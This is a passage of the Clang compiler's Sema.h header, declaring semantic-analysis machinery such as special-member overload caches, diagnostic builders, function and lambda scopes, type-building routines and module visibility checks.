Ambiguous,
Success
};
private:
llvm::PointerIntPair<CXXMethodDecl*, 2> Pair;
public:
SpecialMemberOverloadResult() : Pair() {}
SpecialMemberOverloadResult(CXXMethodDecl *MD)
: Pair(MD, MD->isDeleted() ? NoMemberOrDeleted : Success) {}
CXXMethodDecl *getMethod() const { return Pair.getPointer(); }
void setMethod(CXXMethodDecl *MD) { Pair.setPointer(MD); }
Kind getKind() const { return static_cast<Kind>(Pair.getInt()); }
void setKind(Kind K) { Pair.setInt(K); }
};
class SpecialMemberOverloadResultEntry
: public llvm::FastFoldingSetNode,
public SpecialMemberOverloadResult {
public:
SpecialMemberOverloadResultEntry(const llvm::FoldingSetNodeID &ID)
: FastFoldingSetNode(ID)
{}
};
/// A cache of special member function overload resolution results
/// for C++ records.
llvm::FoldingSet<SpecialMemberOverloadResultEntry> SpecialMemberCache;
/// A cache of the flags available in enumerations with the flag_bits
/// attribute.
mutable llvm::DenseMap<const EnumDecl*, llvm::APInt> FlagBitsCache;
/// The kind of translation unit we are processing.
///
/// When we're processing a complete translation unit, Sema will perform
/// end-of-translation-unit semantic tasks (such as creating
/// initializers for tentative definitions in C) once parsing has
/// completed. Modules and precompiled headers perform different kinds of
/// checks.
TranslationUnitKind TUKind;
llvm::BumpPtrAllocator BumpAlloc;
/// The number of SFINAE diagnostics that have been trapped.
unsigned NumSFINAEErrors;
typedef llvm::DenseMap<ParmVarDecl *, llvm::TinyPtrVector<ParmVarDecl *>>
UnparsedDefaultArgInstantiationsMap;
/// A mapping from parameters with unparsed default arguments to the
/// set of instantiations of each parameter.
///
/// This mapping is a temporary data structure used when parsing
/// nested class templates or nested classes of class templates,
/// where we might end up instantiating an inner class before the
/// default arguments of its methods have been parsed.
UnparsedDefaultArgInstantiationsMap UnparsedDefaultArgInstantiations;
// Contains the locations of the beginning of unparsed default
// arguments.
llvm::DenseMap<ParmVarDecl *, SourceLocation> UnparsedDefaultArgLocs;
/// UndefinedInternals - all the used, undefined objects which require a
/// definition in this translation unit.
llvm::MapVector<NamedDecl *, SourceLocation> UndefinedButUsed;
/// Determine if VD, which must be a variable or function, is an external
/// symbol that nonetheless can't be referenced from outside this translation
/// unit because its type has no linkage and it's not extern "C".
bool isExternalWithNoLinkageType(ValueDecl *VD);
/// Obtain a sorted list of functions that are undefined but ODR-used.
void getUndefinedButUsed(
SmallVectorImpl<std::pair<NamedDecl *, SourceLocation> > &Undefined);
/// Retrieves list of suspicious delete-expressions that will be checked at
/// the end of translation unit.
const llvm::MapVector<FieldDecl *, DeleteLocs> &
getMismatchingDeleteExpressions() const;
typedef std::pair<ObjCMethodList, ObjCMethodList> GlobalMethods;
typedef llvm::DenseMap<Selector, GlobalMethods> GlobalMethodPool;
/// Method Pool - allows efficient lookup when typechecking messages to "id".
/// We need to maintain a list, since selectors can have differing signatures
/// across classes. In Cocoa, this happens to be extremely uncommon (only 1%
/// of selectors are "overloaded").
/// The head of the list records whether there were 0, 1, or >= 2 methods
/// inside categories with a particular selector.
GlobalMethodPool MethodPool;
/// Method selectors used in a \@selector expression. Used for implementation
/// of -Wselector.
llvm::MapVector<Selector, SourceLocation> ReferencedSelectors;
/// List of SourceLocations where 'self' is implicitly retained inside a
/// block.
llvm::SmallVector<std::pair<SourceLocation, const BlockDecl *>, 1>
ImplicitlyRetainedSelfLocs;
/// Kinds of C++ special members.
enum CXXSpecialMember {
CXXDefaultConstructor,
CXXCopyConstructor,
CXXMoveConstructor,
CXXCopyAssignment,
CXXMoveAssignment,
CXXDestructor,
CXXInvalid
};
typedef llvm::PointerIntPair<CXXRecordDecl *, 3, CXXSpecialMember>
SpecialMemberDecl;
/// The C++ special members which we are currently in the process of
/// declaring. If this process recursively triggers the declaration of the
/// same special member, we should act as if it is not yet declared.
llvm::SmallPtrSet<SpecialMemberDecl, 4> SpecialMembersBeingDeclared;
/// Kinds of defaulted comparison operator functions.
enum class DefaultedComparisonKind : unsigned char {
/// This is not a defaultable comparison operator.
None,
/// This is an operator== that should be implemented as a series of
/// subobject comparisons.
Equal,
/// This is an operator<=> that should be implemented as a series of
/// subobject comparisons.
ThreeWay,
/// This is an operator!= that should be implemented as a rewrite in terms
/// of a == comparison.
NotEqual,
/// This is an <, <=, >, or >= that should be implemented as a rewrite in
/// terms of a <=> comparison.
Relational,
};
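// Illustrative C++20 rewrites corresponding to the kinds above:
//
//   struct S {
//     int n;
//     friend bool operator==(const S &, const S &) = default;  // Equal
//     friend auto operator<=>(const S &, const S &) = default; // ThreeWay
//   };
//   // 'a != b' is rewritten as '!(a == b)'     (NotEqual)
//   // 'a < b'  is rewritten as '(a <=> b) < 0' (Relational)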
/// The function definitions which were renamed as part of typo-correction
/// to match their respective declarations. We want to keep track of them
/// to ensure that we don't emit a "redefinition" error if we encounter a
/// correctly named definition after the renamed definition.
llvm::SmallPtrSet<const NamedDecl *, 4> TypoCorrectedFunctionDefinitions;
/// Stack of types that correspond to the parameter entities that are
/// currently being copy-initialized. Can be empty.
llvm::SmallVector<QualType, 4> CurrentParameterCopyTypes;
void ReadMethodPool(Selector Sel);
void updateOutOfDateSelector(Selector Sel);
/// Private Helper predicate to check for 'self'.
bool isSelfExpr(Expr *RExpr);
bool isSelfExpr(Expr *RExpr, const ObjCMethodDecl *Method);
/// Cause the active diagnostic on the DiagnosticsEngine to be
/// emitted. This is closely coupled to the SemaDiagnosticBuilder class and
/// should not be used elsewhere.
void EmitCurrentDiagnostic(unsigned DiagID);
/// Records and restores the CurFPFeatures state on entry/exit of compound
/// statements.
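///
/// A minimal usage sketch (illustrative; 'SemaRef' is a placeholder):
/// \code
///   {
///     FPFeaturesStateRAII SaveFP(SemaRef);
///     // ... handle constructs that mutate SemaRef.CurFPFeatures ...
///   } // the previous CurFPFeatures state is restored here
/// \endcode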
class FPFeaturesStateRAII {
public:
FPFeaturesStateRAII(Sema &S) : S(S), OldFPFeaturesState(S.CurFPFeatures) {}
~FPFeaturesStateRAII() { S.CurFPFeatures = OldFPFeaturesState; }
private:
Sema& S;
FPOptions OldFPFeaturesState;
};
void addImplicitTypedef(StringRef Name, QualType T);
bool WarnedStackExhausted = false;
public:
Sema(Preprocessor &pp, ASTContext &ctxt, ASTConsumer &consumer,
TranslationUnitKind TUKind = TU_Complete,
CodeCompleteConsumer *CompletionConsumer = nullptr);
~Sema();
/// Perform initialization that occurs after the parser has been
/// initialized but before it parses anything.
void Initialize();
const LangOptions &getLangOpts() const { return LangOpts; }
OpenCLOptions &getOpenCLOptions() { return OpenCLFeatures; }
FPOptions &getCurFPFeatures() { return CurFPFeatures; }
DiagnosticsEngine &getDiagnostics() const { return Diags; }
SourceManager &getSourceManager() const { return SourceMgr; }
Preprocessor &getPreprocessor() const { return PP; }
ASTContext &getASTContext() const { return Context; }
ASTConsumer &getASTConsumer() const { return Consumer; }
ASTMutationListener *getASTMutationListener() const;
ExternalSemaSource* getExternalSource() const { return ExternalSource; }
/// Registers an external source. If an external source already exists,
/// creates a multiplex external source and appends to it.
///
/// \param[in] E - A non-null external sema source.
///
void addExternalSource(ExternalSemaSource *E);
void PrintStats() const;
/// Warn that the stack is nearly exhausted.
void warnStackExhausted(SourceLocation Loc);
/// Run some code with "sufficient" stack space. (Currently, at least 256K is
/// guaranteed). Produces a warning if we're low on stack space and allocates
/// more in that case. Use this in code that may recurse deeply (for example,
/// in template instantiation) to avoid stack overflow.
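///
/// A minimal usage sketch (illustrative; 'S' is a Sema instance):
/// \code
///   S.runWithSufficientStackSpace(Loc, [&] {
///     // deeply recursive work, e.g. instantiating a template
///   });
/// \endcode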
void runWithSufficientStackSpace(SourceLocation Loc,
llvm::function_ref<void()> Fn);
/// Helper class that creates diagnostics with optional
/// template instantiation stacks.
///
/// This class provides a wrapper around the basic DiagnosticBuilder
/// class that emits diagnostics. SemaDiagnosticBuilder is
/// responsible for emitting the diagnostic (as DiagnosticBuilder
/// does) and, if the diagnostic comes from inside a template
/// instantiation, printing the template instantiation stack as
/// well.
class SemaDiagnosticBuilder : public DiagnosticBuilder {
Sema &SemaRef;
unsigned DiagID;
public:
SemaDiagnosticBuilder(DiagnosticBuilder &DB, Sema &SemaRef, unsigned DiagID)
: DiagnosticBuilder(DB), SemaRef(SemaRef), DiagID(DiagID) { }
// This is a cunning lie. DiagnosticBuilder actually performs move
// construction in its copy constructor (but due to varied uses, it's not
// possible to conveniently express this as actual move construction). So
// the default copy ctor here is fine, because the base class disables the
// source anyway, which makes the user-defined ~SemaDiagnosticBuilder a safe
// no-op in that case.
SemaDiagnosticBuilder(const SemaDiagnosticBuilder&) = default;
~SemaDiagnosticBuilder() {
// If we aren't active, there is nothing to do.
if (!isActive()) return;
// Otherwise, we need to emit the diagnostic. First flush the underlying
// DiagnosticBuilder data, and clear the diagnostic builder itself so it
// won't emit the diagnostic in its own destructor.
//
// This seems wasteful, in that as written the DiagnosticBuilder dtor will
// do its own needless checks to see if the diagnostic needs to be
// emitted. However, because we take care to ensure that the builder
// objects never escape, a sufficiently smart compiler will be able to
// eliminate that code.
FlushCounts();
Clear();
// Dispatch to Sema to emit the diagnostic.
SemaRef.EmitCurrentDiagnostic(DiagID);
}
/// Teach operator<< to produce an object of the correct type.
template<typename T>
friend const SemaDiagnosticBuilder &operator<<(
const SemaDiagnosticBuilder &Diag, const T &Value) {
const DiagnosticBuilder &BaseDiag = Diag;
BaseDiag << Value;
return Diag;
}
};
/// Emit a diagnostic.
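///
/// For example (illustrative; the diagnostic ID and operands below are
/// placeholders):
/// \code
///   Diag(Loc, diag::err_example) << SomeDecl << SomeType;
/// \endcode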
SemaDiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID) {
DiagnosticBuilder DB = Diags.Report(Loc, DiagID);
return SemaDiagnosticBuilder(DB, *this, DiagID);
}
/// Emit a partial diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, const PartialDiagnostic& PD);
/// Build a partial diagnostic.
PartialDiagnostic PDiag(unsigned DiagID = 0); // in SemaInternal.h
bool findMacroSpelling(SourceLocation &loc, StringRef name);
/// Get a string to suggest for zero-initialization of a type.
std::string
getFixItZeroInitializerForType(QualType T, SourceLocation Loc) const;
std::string getFixItZeroLiteralForType(QualType T, SourceLocation Loc) const;
/// Calls \c Lexer::getLocForEndOfToken()
SourceLocation getLocForEndOfToken(SourceLocation Loc, unsigned Offset = 0);
/// Retrieve the module loader associated with the preprocessor.
ModuleLoader &getModuleLoader() const;
/// Invent a new identifier for parameters of abbreviated templates.
IdentifierInfo *
InventAbbreviatedTemplateParameterTypeName(IdentifierInfo *ParamName,
unsigned Index);
void emitAndClearUnusedLocalTypedefWarnings();
private:
/// Function or variable declarations to be checked for whether the deferred
/// diagnostics should be emitted.
SmallVector<Decl *, 4> DeclsToCheckForDeferredDiags;
public:
// Emit all deferred diagnostics.
void emitDeferredDiags();
enum TUFragmentKind {
/// The global module fragment, between 'module;' and a module-declaration.
Global,
/// A normal translation unit fragment. For a non-module unit, this is the
/// entire translation unit. Otherwise, it runs from the module-declaration
/// to the private-module-fragment (if any) or the end of the TU (if not).
Normal,
/// The private module fragment, between 'module :private;' and the end of
/// the translation unit.
Private
};
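// Illustrative layout of a C++20 module unit and its fragments:
//
//   module;           // TUFragmentKind::Global starts here
//   #include <cstdio>
//   export module M;  // TUFragmentKind::Normal starts here
//   export void f();
//   module :private;  // TUFragmentKind::Private starts here
//   void f() { std::puts("f"); }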
void ActOnStartOfTranslationUnit();
void ActOnEndOfTranslationUnit();
void ActOnEndOfTranslationUnitFragment(TUFragmentKind Kind);
void CheckDelegatingCtorCycles();
Scope *getScopeForContext(DeclContext *Ctx);
void PushFunctionScope();
void PushBlockScope(Scope *BlockScope, BlockDecl *Block);
sema::LambdaScopeInfo *PushLambdaScope();
/// This is used to inform Sema what the current TemplateParameterDepth
/// is during Parsing. Currently it is used to pass on the depth
/// when parsing generic lambda 'auto' parameters.
void RecordParsingTemplateParameterDepth(unsigned Depth);
void PushCapturedRegionScope(Scope *RegionScope, CapturedDecl *CD,
RecordDecl *RD, CapturedRegionKind K,
unsigned OpenMPCaptureLevel = 0);
/// Custom deleter to allow FunctionScopeInfos to be kept alive for a short
/// time after they've been popped.
class PoppedFunctionScopeDeleter {
Sema *Self;
public:
explicit PoppedFunctionScopeDeleter(Sema *Self) : Self(Self) {}
void operator()(sema::FunctionScopeInfo *Scope) const;
};
using PoppedFunctionScopePtr =
std::unique_ptr<sema::FunctionScopeInfo, PoppedFunctionScopeDeleter>;
PoppedFunctionScopePtr
PopFunctionScopeInfo(const sema::AnalysisBasedWarnings::Policy *WP = nullptr,
const Decl *D = nullptr,
QualType BlockType = QualType());
sema::FunctionScopeInfo *getCurFunction() const {
return FunctionScopes.empty() ? nullptr : FunctionScopes.back();
}
sema::FunctionScopeInfo *getEnclosingFunction() const;
void setFunctionHasBranchIntoScope();
void setFunctionHasBranchProtectedScope();
void setFunctionHasIndirectGoto();
void PushCompoundScope(bool IsStmtExpr);
void PopCompoundScope();
sema::CompoundScopeInfo &getCurCompoundScope() const;
bool hasAnyUnrecoverableErrorsInThisFunction() const;
/// Retrieve the current block, if any.
sema::BlockScopeInfo *getCurBlock();
/// Get the innermost lambda enclosing the current location, if any. This
/// looks through intervening non-lambda scopes such as local functions and
/// blocks.
sema::LambdaScopeInfo *getEnclosingLambda() const;
/// Retrieve the current lambda scope info, if any.
/// \param IgnoreNonLambdaCapturingScope true if we should find the top-most
/// lambda scope info, ignoring all inner capturing scopes that are not
/// lambda scopes.
sema::LambdaScopeInfo *
getCurLambda(bool IgnoreNonLambdaCapturingScope = false);
/// Retrieve the current generic lambda info, if any.
sema::LambdaScopeInfo *getCurGenericLambda();
/// Retrieve the current captured region, if any.
sema::CapturedRegionScopeInfo *getCurCapturedRegion();
/// WeakTopLevelDeclDecls - access to \#pragma weak-generated Decls
SmallVectorImpl<Decl *> &WeakTopLevelDecls() { return WeakTopLevelDecl; }
/// Called before parsing a function declarator belonging to a function
/// declaration.
void ActOnStartFunctionDeclarationDeclarator(Declarator &D,
unsigned TemplateParameterDepth);
/// Called after parsing a function declarator belonging to a function
/// declaration.
void ActOnFinishFunctionDeclarationDeclarator(Declarator &D);
void ActOnComment(SourceRange Comment);
//===--------------------------------------------------------------------===//
// Type Analysis / Processing: SemaType.cpp.
//
QualType BuildQualifiedType(QualType T, SourceLocation Loc, Qualifiers Qs,
const DeclSpec *DS = nullptr);
QualType BuildQualifiedType(QualType T, SourceLocation Loc, unsigned CVRA,
const DeclSpec *DS = nullptr);
QualType BuildPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildReferenceType(QualType T, bool LValueRef,
SourceLocation Loc, DeclarationName Entity);
QualType BuildArrayType(QualType T, ArrayType::ArraySizeModifier ASM,
Expr *ArraySize, unsigned Quals,
SourceRange Brackets, DeclarationName Entity);
QualType BuildVectorType(QualType T, Expr *VecSize, SourceLocation AttrLoc);
QualType BuildExtVectorType(QualType T, Expr *ArraySize,
SourceLocation AttrLoc);
QualType BuildMatrixType(QualType T, Expr *NumRows, Expr *NumColumns,
SourceLocation AttrLoc);
QualType BuildAddressSpaceAttr(QualType &T, LangAS ASIdx, Expr *AddrSpace,
SourceLocation AttrLoc);
/// Same as above, but constructs the AddressSpace index if not provided.
QualType BuildAddressSpaceAttr(QualType &T, Expr *AddrSpace,
SourceLocation AttrLoc);
bool CheckQualifiedFunctionForTypeId(QualType T, SourceLocation Loc);
bool CheckFunctionReturnType(QualType T, SourceLocation Loc);
/// Build a function type.
///
/// This routine checks the function type according to C++ rules and
/// under the assumption that the result type and parameter types have
/// just been instantiated from a template. It therefore duplicates
/// some of the behavior of GetTypeForDeclarator, but in a much
/// simpler form that is only suitable for this narrow use case.
///
/// \param T The return type of the function.
///
/// \param ParamTypes The parameter types of the function. This array
/// will be modified to account for adjustments to the types of the
/// function parameters.
///
/// \param Loc The location of the entity whose type involves this
/// function type or, if there is no such entity, the location of the
/// type that will have function type.
///
/// \param Entity The name of the entity that involves the function
/// type, if known.
///
/// \param EPI Extra information about the function type. Usually this will
/// be taken from an existing function with the same prototype.
///
/// \returns A suitable function type, if there are no errors. The
/// unqualified type will always be a FunctionProtoType.
/// Otherwise, returns a NULL type.
QualType BuildFunctionType(QualType T,
MutableArrayRef<QualType> ParamTypes,
SourceLocation Loc, DeclarationName Entity,
const FunctionProtoType::ExtProtoInfo &EPI);
QualType BuildMemberPointerType(QualType T, QualType Class,
SourceLocation Loc,
DeclarationName Entity);
QualType BuildBlockPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildParenType(QualType T);
QualType BuildAtomicType(QualType T, SourceLocation Loc);
QualType BuildReadPipeType(QualType T,
SourceLocation Loc);
QualType BuildWritePipeType(QualType T,
SourceLocation Loc);
QualType BuildExtIntType(bool IsUnsigned, Expr *BitWidth, SourceLocation Loc);
TypeSourceInfo *GetTypeForDeclarator(Declarator &D, Scope *S);
TypeSourceInfo *GetTypeForDeclaratorCast(Declarator &D, QualType FromTy);
/// Package the given type and TSI into a ParsedType.
ParsedType CreateParsedType(QualType T, TypeSourceInfo *TInfo);
DeclarationNameInfo GetNameForDeclarator(Declarator &D);
DeclarationNameInfo GetNameFromUnqualifiedId(const UnqualifiedId &Name);
static QualType GetTypeFromParser(ParsedType Ty,
TypeSourceInfo **TInfo = nullptr);
CanThrowResult canThrow(const Stmt *E);
const FunctionProtoType *ResolveExceptionSpec(SourceLocation Loc,
const FunctionProtoType *FPT);
void UpdateExceptionSpec(FunctionDecl *FD,
const FunctionProtoType::ExceptionSpecInfo &ESI);
bool CheckSpecifiedExceptionType(QualType &T, SourceRange Range);
bool CheckDistantExceptionSpec(QualType T);
bool CheckEquivalentExceptionSpec(FunctionDecl *Old, FunctionDecl *New);
bool CheckEquivalentExceptionSpec(
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool CheckEquivalentExceptionSpec(
const PartialDiagnostic &DiagID, const PartialDiagnostic & NoteID,
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool handlerCanCatch(QualType HandlerType, QualType ExceptionType);
bool CheckExceptionSpecSubset(const PartialDiagnostic &DiagID,
const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const PartialDiagnostic &NoThrowDiagID,
const FunctionProtoType *Superset,
SourceLocation SuperLoc,
const FunctionProtoType *Subset,
SourceLocation SubLoc);
bool CheckParamExceptionSpec(const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const FunctionProtoType *Target,
SourceLocation TargetLoc,
const FunctionProtoType *Source,
SourceLocation SourceLoc);
TypeResult ActOnTypeName(Scope *S, Declarator &D);
/// The parser has parsed the context-sensitive type 'instancetype'
/// in an Objective-C message declaration. Return the appropriate type.
ParsedType ActOnObjCInstanceType(SourceLocation Loc);
/// Abstract class used to diagnose incomplete types.
struct TypeDiagnoser {
TypeDiagnoser() {}
virtual void diagnose(Sema &S, SourceLocation Loc, QualType T) = 0;
virtual ~TypeDiagnoser() {}
};
static int getPrintable(int I) { return I; }
static unsigned getPrintable(unsigned I) { return I; }
static bool getPrintable(bool B) { return B; }
static const char * getPrintable(const char *S) { return S; }
static StringRef getPrintable(StringRef S) { return S; }
static const std::string &getPrintable(const std::string &S) { return S; }
static const IdentifierInfo *getPrintable(const IdentifierInfo *II) {
return II;
}
static DeclarationName getPrintable(DeclarationName N) { return N; }
static QualType getPrintable(QualType T) { return T; }
static SourceRange getPrintable(SourceRange R) { return R; }
static SourceRange getPrintable(SourceLocation L) { return L; }
static SourceRange getPrintable(const Expr *E) { return E->getSourceRange(); }
static SourceRange getPrintable(TypeLoc TL) { return TL.getSourceRange();}
template <typename... Ts> class BoundTypeDiagnoser : public TypeDiagnoser {
protected:
unsigned DiagID;
std::tuple<const Ts &...> Args;
template <std::size_t... Is>
void emit(const SemaDiagnosticBuilder &DB,
std::index_sequence<Is...>) const {
// Apply all tuple elements to the builder in order.
bool Dummy[] = {false, (DB << getPrintable(std::get<Is>(Args)))...};
(void)Dummy;
}
public:
BoundTypeDiagnoser(unsigned DiagID, const Ts &...Args)
: TypeDiagnoser(), DiagID(DiagID), Args(Args...) {
assert(DiagID != 0 && "no diagnostic for type diagnoser");
}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, DiagID);
emit(DB, std::index_sequence_for<Ts...>());
DB << T;
}
};
/// Do a check to make sure \p Name looks like a legal swift_name
/// attribute for the decl \p D. Raise a diagnostic if the name is invalid
/// for the given declaration.
///
/// For a function, this will validate a compound Swift name,
/// e.g. <code>init(foo:bar:baz:)</code> or <code>controllerForName(_:)</code>,
/// and the function will output the number of parameter names, and whether
/// this is a single-arg initializer.
///
/// For a type, enum constant, property, or variable declaration, this will
/// validate either a simple identifier, or a qualified
/// <code>context.identifier</code> name.
///
/// \returns true if the name is a valid swift name for \p D, false otherwise.
bool DiagnoseSwiftName(Decl *D, StringRef Name,
SourceLocation ArgLoc,
const IdentifierInfo *AttrName);
/// A derivative of BoundTypeDiagnoser for which the diagnostic's type
/// parameter is preceded by a 0/1 enum that is 1 if the type is sizeless.
/// For example, a diagnostic with no other parameters would generally have
/// the form "...%select{incomplete|sizeless}0 type %1...".
template <typename... Ts>
class SizelessTypeDiagnoser : public BoundTypeDiagnoser<Ts...> {
public:
SizelessTypeDiagnoser(unsigned DiagID, const Ts &... Args)
: BoundTypeDiagnoser<Ts...>(DiagID, Args...) {}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, this->DiagID);
this->emit(DB, std::index_sequence_for<Ts...>());
DB << T->isSizelessType() << T;
}
};
enum class CompleteTypeKind {
/// Apply the normal rules for complete types. In particular,
/// treat all sizeless types as incomplete.
Normal,
/// Relax the normal rules for complete types so that they include
/// sizeless built-in types.
AcceptSizeless,
// FIXME: Eventually we should flip the default to Normal and opt in
// to AcceptSizeless rather than opt out of it.
Default = AcceptSizeless
};
private:
/// Methods for marking which expressions involve dereferencing a pointer
/// marked with the 'noderef' attribute. Expressions are checked bottom up as
/// they are parsed, meaning that a noderef pointer may not be accessed. For
/// example, in `&*p` where `p` is a noderef pointer, we will first parse the
/// `*p`, but need to check that `address of` is called on it. This requires
/// keeping a container of all pending expressions and checking whether their
/// address is eventually taken.
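///
/// For example (using Clang's 'noderef' type attribute, illustrative):
/// \code
///   int __attribute__((noderef)) *p;
///   int *q = &*p; // OK: the '*' is cancelled by the enclosing '&'
///   int x = *p;   // warned: dereferencing a noderef pointer
/// \endcode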
void CheckSubscriptAccessOfNoDeref(const ArraySubscriptExpr *E);
void CheckAddressOfNoDeref(const Expr *E);
void CheckMemberAccessOfNoDeref(const MemberExpr *E);
bool RequireCompleteTypeImpl(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, TypeDiagnoser *Diagnoser);
struct ModuleScope {
SourceLocation BeginLoc;
clang::Module *Module = nullptr;
bool ModuleInterface = false;
bool ImplicitGlobalModuleFragment = false;
VisibleModuleSet OuterVisibleModules;
};
/// The modules we're currently parsing.
llvm::SmallVector<ModuleScope, 16> ModuleScopes;
/// Namespace definitions that we will export when they finish.
llvm::SmallPtrSet<const NamespaceDecl*, 8> DeferredExportedNamespaces;
/// Get the module whose scope we are currently within.
Module *getCurrentModule() const {
return ModuleScopes.empty() ? nullptr : ModuleScopes.back().Module;
}
VisibleModuleSet VisibleModules;
public:
/// Get the module owning an entity.
Module *getOwningModule(const Decl *Entity) {
return Entity->getOwningModule();
}
/// Make a merged definition of an existing hidden definition \p ND
/// visible at the specified location.
void makeMergedDefinitionVisible(NamedDecl *ND);
bool isModuleVisible(const Module *M, bool ModulePrivate = false);
/// Determine whether a declaration is visible to name lookup.
bool isVisible(const NamedDecl *D) {
return !D->isHidden() || isVisibleSlow(D);
}
/// Determine whether any declaration of an entity is visible.
bool
hasVisibleDeclaration(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr) {
return isVisible(D) || hasVisibleDeclarationSlow(D, Modules);
}
bool hasVisibleDeclarationSlow(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules);
bool hasVisibleMergedDefinition(NamedDecl *Def);
bool hasMergedDefinitionInCurrentModule(NamedDecl *Def);
/// Determine if \p D and \p Suggested have a structurally compatible
/// layout as described in C11 6.2.7/1.
bool hasStructuralCompatLayout(Decl *D, Decl *Suggested);
/// Determine if \p D has a visible definition. If not, suggest a declaration
/// that should be made visible to expose the definition.
bool hasVisibleDefinition(NamedDecl *D, NamedDecl **Suggested,
bool OnlyNeedComplete = false);
bool hasVisibleDefinition(const NamedDecl *D) {
NamedDecl *Hidden;
return hasVisibleDefinition(const_cast<NamedDecl*>(D), &Hidden);
}
/// Determine if the template parameter \p D has a visible default argument.
bool
hasVisibleDefaultArgument(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is an explicit
/// specialization declaration for a specialization of a template. (For a
/// member specialization, use hasVisibleMemberSpecialization.)
bool hasVisibleExplicitSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is a member
/// specialization declaration (as opposed to an instantiated declaration).
bool hasVisibleMemberSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if \p A and \p B are equivalent internal linkage declarations
/// from different modules, and thus an ambiguity error can be downgraded to
/// an extension warning.
bool isEquivalentInternalLinkageDeclaration(const NamedDecl *A,
const NamedDecl *B);
void diagnoseEquivalentInternalLinkageDeclarations(
SourceLocation Loc, const NamedDecl *D,
ArrayRef<const NamedDecl *> Equiv);
bool isUsualDeallocationFunction(const CXXMethodDecl *FD);
bool isCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind = CompleteTypeKind::Default) {
return !RequireCompleteTypeImpl(Loc, T, Kind, nullptr);
}
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, TypeDiagnoser &Diagnoser);
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, unsigned DiagID);
bool RequireCompleteType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, Diagnoser);
}
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, DiagID);
}
template <typename... Ts>
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, Diagnoser);
}
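// A typical call of the variadic overload (sketch; the diagnostic ID is a
// placeholder): the extra arguments are streamed into the diagnostic before
// the type itself, matching BoundTypeDiagnoser::diagnose above.
//
//   if (RequireCompleteType(Loc, T, diag::err_incomplete_example, Range))
//     return true; // the type was incomplete and has been diagnosed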
template <typename... Ts>
bool RequireCompleteSizedType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, CompleteTypeKind::Normal, Diagnoser);
}
void completeExprArrayBound(Expr *E);
bool RequireCompleteExprType(Expr *E, CompleteTypeKind Kind,
TypeDiagnoser &Diagnoser);
bool RequireCompleteExprType(Expr *E, unsigned DiagID);
template <typename... Ts>
bool RequireCompleteExprType(Expr *E, unsigned DiagID, const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Default, Diagnoser);
}
template <typename... Ts>
bool RequireCompleteSizedExprType(Expr *E, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Normal, Diagnoser);
}
bool RequireLiteralType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID);
template <typename... Ts>
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireLiteralType(Loc, T, Diagnoser);
}
QualType getElaboratedType(ElaboratedTypeKeyword Keyword,
const CXXScopeSpec &SS, QualType T,
TagDecl *OwnedTagDecl = nullptr);
QualType BuildTypeofExprType(Expr *E, SourceLocation Loc);
/// If AsUnevaluated is false, E is treated as though it were an evaluated
/// context, such as when building a type for decltype(auto).
QualType BuildDecltypeType(Expr *E, SourceLocation Loc,
bool AsUnevaluated = true);
QualType BuildUnaryTransformType(QualType BaseType,
UnaryTransformType::UTTKind UKind,
SourceLocation Loc);
//===--------------------------------------------------------------------===//
// Symbol table / Decl tracking callbacks: SemaDecl.cpp.
//
struct SkipBodyInfo {
SkipBodyInfo()
: ShouldSkip(false), CheckSameAsPrevious(false), Previous(nullptr),
New(nullptr) {}
bool ShouldSkip;
bool CheckSameAsPrevious;
NamedDecl *Previous;
NamedDecl *New;
};
DeclGroupPtrTy ConvertDeclToDeclGroup(Decl *Ptr, Decl *OwnedType = nullptr);
void DiagnoseUseOfUnimplementedSelectors();
bool isSimpleTypeSpecifier(tok::TokenKind Kind) const;
ParsedType getTypeName(const IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec *SS = nullptr,
bool isClassName = false, bool HasTrailingDot = false,
ParsedType ObjectType = nullptr,
bool IsCtorOrDtorName = false,
bool WantNontrivialTypeSourceInfo = false,
bool IsClassTemplateDeductionContext = true,
